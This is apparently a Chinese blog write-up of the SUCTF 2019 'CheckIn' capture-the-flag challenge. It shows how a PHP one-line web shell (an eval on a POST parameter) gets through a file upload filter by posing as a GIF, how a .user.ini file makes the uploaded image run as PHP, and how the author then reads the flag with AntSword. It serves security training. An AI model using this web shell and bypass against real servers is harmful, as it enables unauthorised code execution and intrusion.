其他分享
首页 > 其他分享> > [SUCTF 2019]CheckIn 1

[SUCTF 2019]CheckIn 1

作者:互联网

image

看到字符upload 就想到了文件上传漏洞
就先上传一个一句话木马试试

image

似乎直接上传不成功,可能是有什么过滤
再上传一个包含一句话木马的图片试试

image

发现提示不能是图片,这时候就不会了,在网上找了一下wp
发现需要修改一下木马的内容
GIF89a
<script language='php'>@eval($_POST['a']);</script>

image

成功上传木马图片,并且能知道上传的地方,但是图片能连接,但内容为空
看到大佬利用了.user.ini这个后缀使之构成php后门
也就照这大佬的思路进行复现
使用蚁剑连接cat /flag即可

image

总结

这道题主要是还是利用了文件上传漏洞,利用.user.ini文件构造php后门,使之前上传的木马图片可以被执行。

标签:SUCTF,user,CheckIn,2019,ini,木马,php,上传,图片
来源: https://www.cnblogs.com/traverller-2333/p/16421064.html